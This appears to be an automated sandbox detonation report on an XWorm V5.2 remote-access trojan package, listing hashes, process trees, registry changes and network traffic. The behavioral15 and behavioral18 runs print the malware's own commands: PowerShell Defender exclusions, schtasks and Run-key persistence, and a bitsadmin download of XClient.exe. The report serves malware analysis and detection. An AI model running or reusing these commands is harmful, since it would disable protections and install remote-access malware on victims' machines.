| SHA256 | d1ee800872c14d799d38ab0fb08b1d3c6573cef795f8c3eb9e3066e106e3dabb |
| SHA512 | 946eebfb60ea5081f59e9f31a56097564cc52e2b688b77d37eecbca3519e1122c872c98a129f27dc86a4032ef18ca4a98f1ddbdd283076e2e880d17bf63149f5 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XWorm V5.2.log
| MD5 | 2ff39f6c7249774be85fd60a8f9a245e |
| SHA1 | 684ff36b31aedc1e587c8496c02722c6698c1c4e |
| SHA256 | e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced |
| SHA512 | 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1 |
Analysis: behavioral10
Detonation Overview
Submitted
2024-08-02 22:42
Reported
2024-08-03 03:31
Platform
win10v2004-20240802-en
Max time kernel
436s
Max time network
442s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Guna.UI2.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral14
Detonation Overview
Submitted
2024-08-02 22:42
Reported
2024-08-03 03:33
Platform
win10v2004-20240802-en
Max time kernel
437s
Max time network
441s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Icons\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 52.111.229.43:443 | tcp | |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral15
Detonation Overview
Submitted
2024-08-02 22:42
Reported
2024-08-03 03:33
Platform
win7-20240708-en
Max time kernel
598s
Max time network
363s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\q11111.lnk | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\q11111.lnk | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
| N/A | N/A | C:\Users\Public\q11111 | N/A |
| N/A | N/A | C:\Users\Public\q11111 | N/A |
| N/A | N/A | C:\Users\Public\q11111 | N/A |
| N/A | N/A | C:\Users\Public\q11111 | N/A |
| N/A | N/A | C:\Users\Public\q11111 | N/A |
| N/A | N/A | C:\Users\Public\q11111 | N/A |
| N/A | N/A | C:\Users\Public\q11111 | N/A |
| N/A | N/A | C:\Users\Public\q11111 | N/A |
| N/A | N/A | C:\Users\Public\q11111 | N/A |
| N/A | N/A | C:\Users\Public\q11111 | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\q11111 = "C:\\Users\\Public\\q11111" | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Public\q11111 | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Public\q11111 | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Public\q11111 | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Public\q11111 | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Public\q11111 | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Public\q11111 | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Public\q11111 | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Public\q11111 | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Public\q11111 | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Public\q11111 | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\Icons\Outfuytftjgfuyjput.exe
"C:\Users\Admin\AppData\Local\Temp\Icons\Outfuytftjgfuyjput.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\q11111'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'q11111'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "q11111" /tr "C:\Users\Public\q11111"
C:\Windows\system32\taskeng.exe
taskeng.exe {D062D8EC-1716-411D-9AFC-EC10BBE39E0C} S-1-5-21-3551809350-4263495960-1443967649-1000:NNYJZAHP\Admin:Interactive:[1]
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Users\Public\q11111
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp |
Files
memory/1716-0-0x000007FEF55F3000-0x000007FEF55F4000-memory.dmp
memory/1716-1-0x00000000000B0000-0x0000000001632000-memory.dmp
C:\Users\Admin\AppData\Roaming\XClient.exe
| MD5 | 767d4d113ea2e9d9886b2aa1710db7f3 |
| SHA1 | f7f779a94fb6fe0e3ee8996dff7951b3b5c7b1b0 |
| SHA256 | b06506ca596951ae4c75e43d5aba7c255c557cf5607915a214c2a3f53e97934f |
| SHA512 | ea1f6b926b2e19d0521dc3939c247094640ba6fb10b8c0a4dbb48306c5b7e8b9a3659d4f83ead234ba3c035ae09d891d8c2c302945f48b94a4a0916d3ca7ee41 |
memory/2236-8-0x0000000001240000-0x0000000001290000-memory.dmp
memory/2236-16-0x000007FEF55F0000-0x000007FEF5FDC000-memory.dmp
memory/2236-47-0x000007FEF55F0000-0x000007FEF5FDC000-memory.dmp
memory/2608-52-0x000000001B700000-0x000000001B9E2000-memory.dmp
memory/2608-53-0x0000000002240000-0x0000000002248000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 37835441f2ee036da3d495d723d1b9fa |
| SHA1 | 9b819bfae003e47693865ff63e0026a33d44db71 |
| SHA256 | ae52a0e97d8add2a61d621f152c1d08a0870513096c5f0e4bc2af6ca7d842a56 |
| SHA512 | b4326f7e2103eb69207a8ab046b8012d0f70b1143c2b916c611dce7fa6974df37f1259d9ed5e700b206e5d25a279b2913e45e833ebaec41d83d917d8a455e30e |
memory/808-59-0x000000001B660000-0x000000001B942000-memory.dmp
memory/808-60-0x0000000002260000-0x0000000002268000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2236-75-0x000007FEF55F0000-0x000007FEF5FDC000-memory.dmp
memory/1324-79-0x0000000001320000-0x0000000001370000-memory.dmp
memory/2924-82-0x0000000000230000-0x0000000000280000-memory.dmp
memory/2768-84-0x0000000000CB0000-0x0000000000D00000-memory.dmp
memory/2216-86-0x0000000001150000-0x00000000011A0000-memory.dmp
memory/1916-88-0x0000000001340000-0x0000000001390000-memory.dmp
memory/2232-92-0x0000000000190000-0x00000000001E0000-memory.dmp
memory/2604-94-0x0000000000390000-0x00000000003E0000-memory.dmp
memory/1300-96-0x0000000000B90000-0x0000000000BE0000-memory.dmp
Analysis: behavioral26
Detonation Overview
Submitted
2024-08-02 22:42
Reported
2024-08-03 03:39
Platform
win10v2004-20240802-en
Max time kernel
436s
Max time network
439s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.Rocks.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.99.105.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.71.105.51.in-addr.arpa | udp |
Files
Analysis: behavioral27
Detonation Overview
Submitted
2024-08-02 22:42
Reported
2024-08-03 03:39
Platform
win7-20240708-en
Max time kernel
361s
Max time network
363s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.dll,#1
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-08-02 22:42
Reported
2024-08-03 03:28
Platform
win10v2004-20240802-en
Max time kernel
419s
Max time network
422s
Command Line
Signatures
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Fixer.bat"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.179.89.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-08-02 22:42
Reported
2024-08-03 03:28
Platform
win10v2004-20240802-en
Max time kernel
415s
Max time network
423s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\GMap.NET.Core.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-08-02 22:42
Reported
2024-08-03 03:29
Platform
win10v2004-20240802-en
Max time kernel
434s
Max time network
437s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\GMap.NET.WindowsForms.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral18
Detonation Overview
Submitted
2024-08-02 22:42
Reported
2024-08-03 03:37
Platform
win10v2004-20240802-en
Max time kernel
597s
Max time network
425s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Icons\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk | C:\Users\Admin\AppData\Local\Temp\XClient.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk | C:\Users\Admin\AppData\Local\Temp\XClient.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" | C:\Users\Admin\AppData\Local\Temp\XClient.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\XClient.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\XClient.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\Icons\Output.exe
"C:\Users\Admin\AppData\Local\Temp\Icons\Output.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\bitsadmin.exe
"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
C:\Users\Admin\AppData\Local\Temp\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\XClient.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.example.com | udp |
| US | 93.184.215.14:80 | www.example.com | tcp |
| US | 8.8.8.8:53 | 14.215.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
